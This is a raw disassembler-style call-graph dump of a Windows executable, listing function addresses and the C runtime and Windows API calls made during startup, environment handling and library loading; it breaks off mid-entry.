7ff6e60c6c30 15965->15966 15967 7ff6e60c6c19 15965->15967 15966->15967 15970 7ff6e60c6c3e 15966->15970 15968 7ff6e60b54c4 _set_fmode 11 API calls 15967->15968 15969 7ff6e60c6c1e 15968->15969 15971 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 15969->15971 15972 7ff6e60b4f98 45 API calls 15970->15972 15973 7ff6e60c6c29 15970->15973 15971->15973 15972->15973 15973->15580 15975 7ff6e60b4f98 45 API calls 15974->15975 15976 7ff6e60c9849 15975->15976 15979 7ff6e60c94a0 15976->15979 15983 7ff6e60c94ee 15979->15983 15980 7ff6e60abcc0 _wfindfirst32i64 8 API calls 15981 7ff6e60c7ad5 15980->15981 15981->15580 15981->15586 15982 7ff6e60c9575 15984 7ff6e60bfc00 _fread_nolock MultiByteToWideChar 15982->15984 15988 7ff6e60c9579 15982->15988 15983->15982 15985 7ff6e60c9560 GetCPInfo 15983->15985 15983->15988 15986 7ff6e60c960d 15984->15986 15985->15982 15985->15988 15987 7ff6e60bdbbc _fread_nolock 12 API calls 15986->15987 15986->15988 15989 7ff6e60c9644 15986->15989 15987->15989 15988->15980 15989->15988 15990 7ff6e60bfc00 _fread_nolock MultiByteToWideChar 15989->15990 15991 7ff6e60c96b2 15990->15991 15992 7ff6e60c9794 15991->15992 15993 7ff6e60bfc00 _fread_nolock MultiByteToWideChar 15991->15993 15992->15988 15994 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15992->15994 15995 7ff6e60c96d8 15993->15995 15994->15988 15995->15992 15996 7ff6e60bdbbc _fread_nolock 12 API calls 15995->15996 15997 7ff6e60c9705 15995->15997 15996->15997 15997->15992 15998 7ff6e60bfc00 _fread_nolock MultiByteToWideChar 15997->15998 15999 7ff6e60c977c 15998->15999 16000 7ff6e60c9782 15999->16000 16001 7ff6e60c979c 15999->16001 16000->15992 16003 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16000->16003 16008 7ff6e60bf428 16001->16008 16003->15992 16005 7ff6e60c97db 16005->15988 16007 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16005->16007 16006 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16006->16005 16007->15988 16009 7ff6e60bf1d0 __crtLCMapStringW 5 API calls 16008->16009 16011 7ff6e60bf466 16009->16011 16010 7ff6e60bf46e 16010->16005 16010->16006 16011->16010 16012 7ff6e60bf690 __crtLCMapStringW 5 API calls 16011->16012 16013 7ff6e60bf4d7 CompareStringW 16012->16013 16013->16010 16015 7ff6e60bf1d0 __crtLCMapStringW 5 API calls 16014->16015 16016 7ff6e60bf404 16015->16016 16016->15590 16018 7ff6e60b55ae 16017->16018 16019 7ff6e60b55d2 16017->16019 16023 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16018->16023 16026 7ff6e60b55bd 16018->16026 16020 7ff6e60b55d7 16019->16020 16021 7ff6e60b562c 16019->16021 16024 7ff6e60b55ec 16020->16024 16020->16026 16027 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16020->16027 16022 7ff6e60bfc00 _fread_nolock MultiByteToWideChar 16021->16022 16034 7ff6e60b5648 16022->16034 16023->16026 16028 7ff6e60bdbbc _fread_nolock 12 API calls 16024->16028 16025 7ff6e60b564f GetLastError 16039 7ff6e60b5438 16025->16039 16026->15594 16026->15595 16027->16024 16028->16026 16030 7ff6e60b568a 16030->16026 16031 7ff6e60bfc00 _fread_nolock MultiByteToWideChar 16030->16031 16036 7ff6e60b56ce 16031->16036 16033 7ff6e60b567d 16035 7ff6e60bdbbc _fread_nolock 12 API calls 16033->16035 16034->16025 16034->16030 16034->16033 16038 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16034->16038 16035->16030 16036->16025 16036->16026 16037 7ff6e60b54c4 _set_fmode 11 API calls 16037->16026 16038->16033 16040 7ff6e60bb888 _set_fmode 11 API calls 16039->16040 16041 7ff6e60b5445 Concurrency::details::SchedulerProxy::DeleteThis 16040->16041 16042 7ff6e60bb888 _set_fmode 11 API calls 16041->16042 16043 7ff6e60b5467 16042->16043 16043->16037 16045 7ff6e60b97b5 16044->16045 16046 7ff6e60b97b1 16044->16046 16065 7ff6e60c30ac GetEnvironmentStringsW 16045->16065 16046->15625 16057 7ff6e60b9b5c 16046->16057 16049 7ff6e60b97ce 16072 7ff6e60b991c 16049->16072 16050 7ff6e60b97c2 16051 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16050->16051 16051->16046 16054 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16055 7ff6e60b97f5 16054->16055 16056 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16055->16056 16056->16046 16058 7ff6e60b9b7f 16057->16058 16063 7ff6e60b9b96 16057->16063 16058->15625 16059 7ff6e60bf158 _set_fmode 11 API calls 16059->16063 16060 7ff6e60b9c0a 16062 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16060->16062 16061 7ff6e60bfc00 MultiByteToWideChar _fread_nolock 16061->16063 16062->16058 16063->16058 16063->16059 16063->16060 16063->16061 16064 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16063->16064 16064->16063 16066 7ff6e60b97ba 16065->16066 16067 7ff6e60c30d0 16065->16067 16066->16049 16066->16050 16068 7ff6e60bdbbc _fread_nolock 12 API calls 16067->16068 16069 7ff6e60c3107 memcpy_s 16068->16069 16070 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16069->16070 16071 7ff6e60c3127 FreeEnvironmentStringsW 16070->16071 16071->16066 16073 7ff6e60b9944 16072->16073 16074 7ff6e60bf158 _set_fmode 11 API calls 16073->16074 16081 7ff6e60b997f 16074->16081 16075 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16077 7ff6e60b97d6 16075->16077 16076 7ff6e60b9a01 16078 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16076->16078 16077->16054 16078->16077 16079 7ff6e60bf158 _set_fmode 11 API calls 16079->16081 16080 7ff6e60b99f0 16083 7ff6e60b9a38 11 API calls 16080->16083 16081->16076 16081->16079 16081->16080 16082 7ff6e60c0e54 _wfindfirst32i64 37 API calls 16081->16082 16086 7ff6e60b9a24 16081->16086 16087 7ff6e60b9987 16081->16087 16089 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16081->16089 16082->16081 16084 7ff6e60b99f8 16083->16084 16085 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16084->16085 16085->16087 16088 7ff6e60baec4 _wfindfirst32i64 17 API calls 16086->16088 16087->16075 16090 7ff6e60b9a36 16088->16090 16089->16081 16093 7ff6e60c9409 __crtLCMapStringW 16091->16093 16092 7ff6e60c79be 16092->15649 16092->15650 16093->16092 16094 7ff6e60bf428 6 API calls 16093->16094 16094->16092 15232 7ff6e60b9ef1 15244 7ff6e60ba968 15232->15244 15249 7ff6e60bb710 GetLastError 15244->15249 15250 7ff6e60bb751 FlsSetValue 15249->15250 15251 7ff6e60bb734 FlsGetValue 15249->15251 15253 7ff6e60bb763 15250->15253 15269 7ff6e60bb741 15250->15269 15252 7ff6e60bb74b 15251->15252 15251->15269 15252->15250 15255 7ff6e60bf158 _set_fmode 11 API calls 15253->15255 15254 7ff6e60bb7bd SetLastError 15256 7ff6e60bb7dd 15254->15256 15257 7ff6e60ba971 15254->15257 15258 7ff6e60bb772 15255->15258 15259 7ff6e60baa9c __GetCurrentState 38 API calls 15256->15259 15271 7ff6e60baa9c 15257->15271 15260 7ff6e60bb790 FlsSetValue 15258->15260 15261 7ff6e60bb780 FlsSetValue 15258->15261 15264 7ff6e60bb7e2 15259->15264 15262 7ff6e60bb7ae 15260->15262 15263 7ff6e60bb79c FlsSetValue 15260->15263 15265 7ff6e60bb789 15261->15265 15266 7ff6e60bb4b8 _set_fmode 11 API calls 15262->15266 15263->15265 15267 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15265->15267 15268 7ff6e60bb7b6 15266->15268 15267->15269 15270 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 15268->15270 15269->15254 15270->15254 15280 7ff6e60c3cc0 15271->15280 15314 7ff6e60c3c78 15280->15314 15319 7ff6e60c0cb8 EnterCriticalSection 15314->15319 19393 7ff6e60caaf4 19396 7ff6e60b5378 LeaveCriticalSection 19393->19396 19124 7ff6e60ca96e 19125 7ff6e60ca97e 19124->19125 19128 7ff6e60b5378 LeaveCriticalSection 19125->19128 18927 7ff6e60bfcec 18928 7ff6e60bfede 18927->18928 18930 7ff6e60bfd2e _isindst 18927->18930 18929 7ff6e60b54c4 _set_fmode 11 API calls 18928->18929 18947 7ff6e60bfece 18929->18947 18930->18928 18933 7ff6e60bfdae _isindst 18930->18933 18931 7ff6e60abcc0 _wfindfirst32i64 8 API calls 18932 7ff6e60bfef9 18931->18932 18948 7ff6e60c6904 18933->18948 18938 7ff6e60bff0a 18940 7ff6e60baec4 _wfindfirst32i64 17 API calls 18938->18940 18942 7ff6e60bff1e 18940->18942 18945 7ff6e60bfe0b 18945->18947 18973 7ff6e60c6948 18945->18973 18947->18931 18949 7ff6e60bfdcc 18948->18949 18950 7ff6e60c6913 18948->18950 18955 7ff6e60c5d08 18949->18955 18980 7ff6e60c0cb8 EnterCriticalSection 18950->18980 18956 7ff6e60c5d11 18955->18956 18957 7ff6e60bfde1 18955->18957 18958 7ff6e60b54c4 _set_fmode 11 API calls 18956->18958 18957->18938 18961 7ff6e60c5d38 18957->18961 18959 7ff6e60c5d16 18958->18959 18960 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 18959->18960 18960->18957 18962 7ff6e60c5d41 18961->18962 18963 7ff6e60bfdf2 18961->18963 18964 7ff6e60b54c4 _set_fmode 11 API calls 18962->18964 18963->18938 18967 7ff6e60c5d68 18963->18967 18965 7ff6e60c5d46 18964->18965 18966 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 18965->18966 18966->18963 18968 7ff6e60c5d71 18967->18968 18969 7ff6e60bfe03 18967->18969 18970 7ff6e60b54c4 _set_fmode 11 API calls 18968->18970 18969->18938 18969->18945 18971 7ff6e60c5d76 18970->18971 18972 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 18971->18972 18972->18969 18981 7ff6e60c0cb8 EnterCriticalSection 18973->18981 19417 7ff6e60ba2e0 19420 7ff6e60ba25c 19417->19420 19427 7ff6e60c0cb8 EnterCriticalSection 19420->19427 19428 7ff6e60bcae0 19439 7ff6e60c0cb8 EnterCriticalSection 19428->19439 19159 7ff6e60abf90 19160 7ff6e60abfa0 19159->19160 19176 7ff6e60ba138 19160->19176 19162 7ff6e60abfac 19182 7ff6e60ac298 19162->19182 19164 7ff6e60ac57c 7 API calls 19166 7ff6e60ac045 19164->19166 19165 7ff6e60abfc4 _RTC_Initialize 19174 7ff6e60ac019 19165->19174 19187 7ff6e60ac448 19165->19187 19168 7ff6e60abfd9 19190 7ff6e60b95a4 19168->19190 19174->19164 19175 7ff6e60ac035 19174->19175 19177 7ff6e60ba149 19176->19177 19178 7ff6e60b54c4 _set_fmode 11 API calls 19177->19178 19181 7ff6e60ba151 19177->19181 19179 7ff6e60ba160 19178->19179 19180 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 19179->19180 19180->19181 19181->19162 19183 7ff6e60ac2ae __scrt_release_startup_lock 19182->19183 19184 7ff6e60ac2a9 19182->19184 19183->19165 19184->19183 19185 7ff6e60ac57c 7 API calls 19184->19185 19186 7ff6e60ac322 19185->19186 19215 7ff6e60ac40c 19187->19215 19189 7ff6e60ac451 19189->19168 19191 7ff6e60b95c4 19190->19191 19192 7ff6e60abfe5 19190->19192 19193 7ff6e60b95e2 GetModuleFileNameW 19191->19193 19194 7ff6e60b95cc 19191->19194 19192->19174 19214 7ff6e60ac51c InitializeSListHead 19192->19214 19198 7ff6e60b960d 19193->19198 19195 7ff6e60b54c4 _set_fmode 11 API calls 19194->19195 19196 7ff6e60b95d1 19195->19196 19197 7ff6e60baea4 _invalid_parameter_noinfo 37 API calls 19196->19197 19197->19192 19230 7ff6e60b9544 19198->19230 19201 7ff6e60b9655 19202 7ff6e60b54c4 _set_fmode 11 API calls 19201->19202 19203 7ff6e60b965a 19202->19203 19204 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19203->19204 19204->19192 19205 7ff6e60b968f 19207 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19205->19207 19206 7ff6e60b966d 19206->19205 19208 7ff6e60b96d4 19206->19208 19209 7ff6e60b96bb 19206->19209 19207->19192 19211 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19208->19211 19210 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19209->19210 19212 7ff6e60b96c4 19210->19212 19211->19205 19213 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19212->19213 19213->19192 19216 7ff6e60ac426 19215->19216 19217 7ff6e60ac41f 19215->19217 19219 7ff6e60ba77c 19216->19219 19217->19189 19222 7ff6e60ba3b8 19219->19222 19229 7ff6e60c0cb8 EnterCriticalSection 19222->19229 19231 7ff6e60b955c 19230->19231 19235 7ff6e60b9594 19230->19235 19232 7ff6e60bf158 _set_fmode 11 API calls 19231->19232 19231->19235 19233 7ff6e60b958a 19232->19233 19234 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19233->19234 19234->19235 19235->19201 19235->19206 19514 7ff6e60b5310 19515 7ff6e60b531b 19514->19515 19523 7ff6e60bf764 19515->19523 19536 7ff6e60c0cb8 EnterCriticalSection 19523->19536 19236 7ff6e60bb590 19237 7ff6e60bb595 19236->19237 19241 7ff6e60bb5aa 19236->19241 19242 7ff6e60bb5b0 19237->19242 19243 7ff6e60bb5f2 19242->19243 19247 7ff6e60bb5fa 19242->19247 19244 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19243->19244 19244->19247 19245 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19246 7ff6e60bb607 19245->19246 19248 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19246->19248 19247->19245 19249 7ff6e60bb614 19248->19249 19250 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19249->19250 19251 7ff6e60bb621 19250->19251 19252 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19251->19252 19253 7ff6e60bb62e 19252->19253 19254 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19253->19254 19255 7ff6e60bb63b 19254->19255 19256 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19255->19256 19257 7ff6e60bb648 19256->19257 19258 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19257->19258 19259 7ff6e60bb655 19258->19259 19260 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19259->19260 19261 7ff6e60bb665 19260->19261 19262 7ff6e60baf0c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19261->19262 19263 7ff6e60bb675 19262->19263 19268 7ff6e60bb458 19263->19268 19282 7ff6e60c0cb8 EnterCriticalSection 19268->19282 19298 7ff6e60cab89 19299 7ff6e60caba2 19298->19299 19300 7ff6e60cab98 19298->19300 19302 7ff6e60c0d18 LeaveCriticalSection 19300->19302 16162 7ff6e60ac07c 16183 7ff6e60ac24c 16162->16183 16165 7ff6e60ac1c8 16279 7ff6e60ac57c IsProcessorFeaturePresent 16165->16279 16166 7ff6e60ac098 __scrt_acquire_startup_lock 16168 7ff6e60ac1d2 16166->16168 16173 7ff6e60ac0b6 __scrt_release_startup_lock 16166->16173 16169 7ff6e60ac57c 7 API calls 16168->16169 16171 7ff6e60ac1dd __GetCurrentState 16169->16171 16170 7ff6e60ac0db 16172 7ff6e60ac161 16189 7ff6e60ac6c8 16172->16189 16173->16170 16173->16172 16268 7ff6e60ba0bc 16173->16268 16175 7ff6e60ac166 16192 7ff6e60a1000 16175->16192 16180 7ff6e60ac189 16180->16171 16275 7ff6e60ac3e0 16180->16275 16286 7ff6e60ac84c 16183->16286 16186 7ff6e60ac27b __scrt_initialize_crt 16188 7ff6e60ac090 16186->16188 16288 7ff6e60ad998 16186->16288 16188->16165 16188->16166 16315 7ff6e60ad0e0 16189->16315 16193 7ff6e60a100b 16192->16193 16317 7ff6e60a86b0 16193->16317 16195 7ff6e60a101d 16324 7ff6e60b5ef8 16195->16324 16197 7ff6e60a39cb 16331 7ff6e60a1eb0 16197->16331 16201 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16202 7ff6e60a3ae6 16201->16202 16273 7ff6e60ac70c GetModuleHandleW 16202->16273 16203 7ff6e60a39ea 16266 7ff6e60a3ad2 16203->16266 16347 7ff6e60a7b60 16203->16347 16205 7ff6e60a3a1f 16206 7ff6e60a3a6b 16205->16206 16208 7ff6e60a7b60 61 API calls 16205->16208 16362 7ff6e60a8040 16206->16362 16212 7ff6e60a3a40 __std_exception_copy 16208->16212 16209 7ff6e60a3a80 16366 7ff6e60a1cb0 16209->16366 16212->16206 16216 7ff6e60a8040 58 API calls 16212->16216 16213 7ff6e60a3b71 16214 7ff6e60a3b95 16213->16214 16385 7ff6e60a14f0 16213->16385 16219 7ff6e60a3bef 16214->16219 16214->16266 16392 7ff6e60a8ae0 16214->16392 16215 7ff6e60a1cb0 121 API calls 16217 7ff6e60a3ab6 16215->16217 16216->16206 16221 7ff6e60a3af8 16217->16221 16222 7ff6e60a3aba 16217->16222 16406 7ff6e60a6de0 16219->16406 16221->16213 16480 7ff6e60a3fd0 16221->16480 16467 7ff6e60a2b30 16222->16467 16224 7ff6e60a3bcc 16228 7ff6e60a3bd1 16224->16228 16229 7ff6e60a3be2 SetDllDirectoryW 16224->16229 16231 7ff6e60a2b30 59 API calls 16228->16231 16229->16219 16231->16266 16233 7ff6e60a3b16 16236 7ff6e60a2b30 59 API calls 16233->16236 16234 7ff6e60a3c09 16260 7ff6e60a3c3b 16234->16260 16512 7ff6e60a65f0 16234->16512 16236->16266 16237 7ff6e60a3d06 16410 7ff6e60a34c0 16237->16410 16238 7ff6e60a3b44 16238->16213 16241 7ff6e60a3b49 16238->16241 16499 7ff6e60b018c 16241->16499 16245 7ff6e60a3c5a 16251 7ff6e60a3ca5 16245->16251 16548 7ff6e60a1ef0 16245->16548 16246 7ff6e60a3c3d 16247 7ff6e60a6840 FreeLibrary 16246->16247 16247->16260 16251->16266 16552 7ff6e60a3460 16251->16552 16253 7ff6e60a3d2e 16256 7ff6e60a7b60 61 API calls 16253->16256 16257 7ff6e60a3d3a 16256->16257 16424 7ff6e60a8080 16257->16424 16258 7ff6e60a3ce1 16262 7ff6e60a6840 FreeLibrary 16258->16262 16260->16237 16260->16245 16262->16266 16266->16201 16269 7ff6e60ba0f4 16268->16269 16270 7ff6e60ba0d3 16268->16270 16271 7ff6e60ba968 45 API calls 16269->16271 16270->16172 16272 7ff6e60ba0f9 16271->16272 16274 7ff6e60ac71d 16273->16274 16274->16180 16277 7ff6e60ac3f1 16275->16277 16276 7ff6e60ac1a0 16276->16170 16277->16276 16278 7ff6e60ad998 __scrt_initialize_crt 7 API calls 16277->16278 16278->16276 16280 7ff6e60ac5a2 _wfindfirst32i64 __scrt_get_show_window_mode 16279->16280 16281 7ff6e60ac5c1 RtlCaptureContext RtlLookupFunctionEntry 16280->16281 16282 7ff6e60ac626 __scrt_get_show_window_mode 16281->16282 16283 7ff6e60ac5ea RtlVirtualUnwind 16281->16283 16284 7ff6e60ac658 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16282->16284 16283->16282 16285 7ff6e60ac6aa _wfindfirst32i64 16284->16285 16285->16168 16287 7ff6e60ac26e __scrt_dllmain_crt_thread_attach 16286->16287 16287->16186 16287->16188 16289 7ff6e60ad9a0 16288->16289 16290 7ff6e60ad9aa 16288->16290 16294 7ff6e60add14 16289->16294 16290->16188 16295 7ff6e60ad9a5 16294->16295 16296 7ff6e60add23 16294->16296 16298 7ff6e60add80 16295->16298 16302 7ff6e60adf50 16296->16302 16299 7ff6e60addab 16298->16299 16300 7ff6e60add8e DeleteCriticalSection 16299->16300 16301 7ff6e60addaf 16299->16301 16300->16299 16301->16290 16306 7ff6e60addb8 16302->16306 16307 7ff6e60addfc __vcrt_FlsAlloc 16306->16307 16313 7ff6e60aded2 TlsFree 16306->16313 16308 7ff6e60ade2a LoadLibraryExW 16307->16308 16311 7ff6e60adec1 GetProcAddress 16307->16311 16307->16313 16314 7ff6e60ade6d LoadLibraryExW 16307->16314 16309 7ff6e60adea1 16308->16309 16310 7ff6e60ade4b GetLastError 16308->16310 16309->16311 16312 7ff6e60adeb8 FreeLibrary 16309->16312 16310->16307 16311->16313 16312->16311 16314->16307 16314->16309 16316 7ff6e60ac6df GetStartupInfoW 16315->16316 16316->16175 16318 7ff6e60a86cf 16317->16318 16319 7ff6e60a86d7 __std_exception_copy 16318->16319 16320 7ff6e60a8720 WideCharToMultiByte 16318->16320 16321 7ff6e60a87c6 16318->16321 16322 7ff6e60a8774 WideCharToMultiByte 16318->16322 16319->16195 16320->16318 16320->16321 16586 7ff6e60a29e0 16321->16586 16322->16318 16322->16321 16327 7ff6e60c0050 16324->16327 16325 7ff6e60c00a3 16326 7ff6e60badd8 _invalid_parameter_noinfo 37 API calls 16325->16326 16330 7ff6e60c00cc 16326->16330 16327->16325 16328 7ff6e60c00f6 16327->16328 16917 7ff6e60bff28 16328->16917 16330->16197 16333 7ff6e60a1ec5 16331->16333 16332 7ff6e60a1ee0 16332->16266 16335 7ff6e60a3ec0 16332->16335 16333->16332 16925 7ff6e60a2890 16333->16925 16336 7ff6e60abc60 16335->16336 16337 7ff6e60a3ecc GetModuleFileNameW 16336->16337 16338 7ff6e60a3f12 16337->16338 16339 7ff6e60a3efb 16337->16339 16965 7ff6e60a8bf0 16338->16965 16340 7ff6e60a29e0 57 API calls 16339->16340 16345 7ff6e60a3f0e 16340->16345 16343 7ff6e60a2b30 59 API calls 16343->16345 16344 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16346 7ff6e60a3f4f 16344->16346 16345->16344 16346->16203 16348 7ff6e60a7b6a 16347->16348 16349 7ff6e60a8ae0 57 API calls 16348->16349 16350 7ff6e60a7b8c GetEnvironmentVariableW 16349->16350 16351 7ff6e60a7ba4 ExpandEnvironmentStringsW 16350->16351 16352 7ff6e60a7bf6 16350->16352 16353 7ff6e60a8bf0 59 API calls 16351->16353 16354 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16352->16354 16355 7ff6e60a7bcc 16353->16355 16356 7ff6e60a7c08 16354->16356 16355->16352 16357 7ff6e60a7bd6 16355->16357 16356->16205 16976 7ff6e60ba99c 16357->16976 16360 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16361 7ff6e60a7bee 16360->16361 16361->16205 16363 7ff6e60a8ae0 57 API calls 16362->16363 16364 7ff6e60a8057 SetEnvironmentVariableW 16363->16364 16365 7ff6e60a806f __std_exception_copy 16364->16365 16365->16209 16367 7ff6e60a1cbe 16366->16367 16368 7ff6e60a1ef0 49 API calls 16367->16368 16369 7ff6e60a1cf4 16368->16369 16370 7ff6e60a1ef0 49 API calls 16369->16370 16380 7ff6e60a1dde 16369->16380 16371 7ff6e60a1d1a 16370->16371 16371->16380 16983 7ff6e60a1aa0 16371->16983 16372 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16373 7ff6e60a1e6c 16372->16373 16373->16213 16373->16215 16377 7ff6e60a1dcc 16378 7ff6e60a3e40 49 API calls 16377->16378 16378->16380 16379 7ff6e60a1d8f 16379->16377 16381 7ff6e60a1e34 16379->16381 16380->16372 16382 7ff6e60a3e40 49 API calls 16381->16382 16383 7ff6e60a1e41 16382->16383 17019 7ff6e60a4050 16383->17019 16386 7ff6e60a157f 16385->16386 16387 7ff6e60a1506 16385->16387 16386->16214 17061 7ff6e60a7950 16387->17061 16390 7ff6e60a2b30 59 API calls 16391 7ff6e60a1564 16390->16391 16391->16214 16393 7ff6e60a8b01 MultiByteToWideChar 16392->16393 16394 7ff6e60a8b87 MultiByteToWideChar 16392->16394 16397 7ff6e60a8b27 16393->16397 16401 7ff6e60a8b4c 16393->16401 16395 7ff6e60a8bcf 16394->16395 16396 7ff6e60a8baa 16394->16396 16395->16224 16398 7ff6e60a29e0 55 API calls 16396->16398 16399 7ff6e60a29e0 55 API calls 16397->16399 16402 7ff6e60a8bbd 16398->16402 16400 7ff6e60a8b3a 16399->16400 16400->16224 16401->16394 16403 7ff6e60a8b62 16401->16403 16402->16224 16404 7ff6e60a29e0 55 API calls 16403->16404 16405 7ff6e60a8b75 16404->16405 16405->16224 16407 7ff6e60a6df5 16406->16407 16408 7ff6e60a3bf4 16407->16408 16409 7ff6e60a2890 59 API calls 16407->16409 16408->16260 16503 7ff6e60a6a90 16408->16503 16409->16408 16411 7ff6e60a3574 16410->16411 16414 7ff6e60a3533 16410->16414 16412 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16411->16412 16413 7ff6e60a35c5 16412->16413 16413->16266 16417 7ff6e60a7fd0 16413->16417 16414->16411 17586 7ff6e60a1710 16414->17586 17628 7ff6e60a2d70 16414->17628 16418 7ff6e60a8ae0 57 API calls 16417->16418 16419 7ff6e60a7fef 16418->16419 16420 7ff6e60a8ae0 57 API calls 16419->16420 16421 7ff6e60a7fff 16420->16421 16422 7ff6e60b7dec 38 API calls 16421->16422 16423 7ff6e60a800d __std_exception_copy 16422->16423 16423->16253 16425 7ff6e60a8090 16424->16425 16426 7ff6e60a8ae0 57 API calls 16425->16426 16468 7ff6e60a2b50 16467->16468 16469 7ff6e60b4ac4 49 API calls 16468->16469 16470 7ff6e60a2b9b __scrt_get_show_window_mode 16469->16470 16471 7ff6e60a8ae0 57 API calls 16470->16471 16472 7ff6e60a2bd0 16471->16472 16473 7ff6e60a2bd5 16472->16473 16474 7ff6e60a2c0d MessageBoxA 16472->16474 16475 7ff6e60a8ae0 57 API calls 16473->16475 16476 7ff6e60a2c27 16474->16476 16477 7ff6e60a2bef MessageBoxW 16475->16477 16478 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16476->16478 16477->16476 16479 7ff6e60a2c37 16478->16479 16479->16266 16481 7ff6e60a3fdc 16480->16481 16482 7ff6e60a8ae0 57 API calls 16481->16482 16483 7ff6e60a4007 16482->16483 16484 7ff6e60a8ae0 57 API calls 16483->16484 16485 7ff6e60a401a 16484->16485 18123 7ff6e60b64a8 16485->18123 16488 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16489 7ff6e60a3b0e 16488->16489 16489->16233 16490 7ff6e60a82b0 16489->16490 16491 7ff6e60a82d4 16490->16491 16492 7ff6e60b0814 73 API calls 16491->16492 16497 7ff6e60a83ab __std_exception_copy 16491->16497 16493 7ff6e60a82ee 16492->16493 16493->16497 18502 7ff6e60b9070 16493->18502 16497->16238 16500 7ff6e60b01bc 16499->16500 18517 7ff6e60aff68 16500->18517 16504 7ff6e60a6ab3 16503->16504 16505 7ff6e60a6aca 16503->16505 16504->16505 18528 7ff6e60a15a0 16504->18528 16505->16234 16507 7ff6e60a6ad4 16507->16505 16508 7ff6e60a4050 49 API calls 16507->16508 16509 7ff6e60a6b35 16508->16509 16510 7ff6e60a2b30 59 API calls 16509->16510 16511 7ff6e60a6ba5 __std_exception_copy memcpy_s 16509->16511 16510->16505 16511->16234 16517 7ff6e60a660a memcpy_s 16512->16517 16514 7ff6e60a672f 16516 7ff6e60a4050 49 API calls 16514->16516 16515 7ff6e60a674b 16518 7ff6e60a2b30 59 API calls 16515->16518 16519 7ff6e60a67a8 16516->16519 16517->16514 16517->16515 16520 7ff6e60a4050 49 API calls 16517->16520 16521 7ff6e60a6710 16517->16521 16529 7ff6e60a1710 144 API calls 16517->16529 16530 7ff6e60a6731 16517->16530 18552 7ff6e60a1950 16517->18552 16524 7ff6e60a6741 __std_exception_copy 16518->16524 16522 7ff6e60a4050 49 API calls 16519->16522 16520->16517 16521->16514 16523 7ff6e60a4050 49 API calls 16521->16523 16526 7ff6e60a67d8 16522->16526 16523->16514 16525 7ff6e60abcc0 _wfindfirst32i64 8 API calls 16524->16525 16527 7ff6e60a3c1a 16525->16527 16528 7ff6e60a4050 49 API calls 16526->16528 16527->16246 16532 7ff6e60a6570 16527->16532 16528->16524 16529->16517 16531 7ff6e60a2b30 59 API calls 16530->16531 16531->16524 18556 7ff6e60a8260 16532->18556 16534 7ff6e60a658c 16535 7ff6e60a8260 58 API calls 16534->16535 16536 7ff6e60a659f 16535->16536 16537 7ff6e60a65d5 16536->16537 16538 7ff6e60a65b7 16536->16538 16539 7ff6e60a2b30 59 API calls 16537->16539 18560 7ff6e60a6ef0 GetProcAddress 16538->18560 16549 7ff6e60a1f15 16548->16549 16550 7ff6e60b4ac4 49 API calls 16549->16550 16551 7ff6e60a1f38 16550->16551 16551->16251 18619 7ff6e60a5bc0 16552->18619 16555 7ff6e60a34ad 16555->16258 16605 7ff6e60abc60 16586->16605 16589 7ff6e60a2a29 16607 7ff6e60b4ac4 16589->16607 16594 7ff6e60a1ef0 49 API calls 16595 7ff6e60a2a86 __scrt_get_show_window_mode 16594->16595 16596 7ff6e60a8ae0 54 API calls 16595->16596 16597 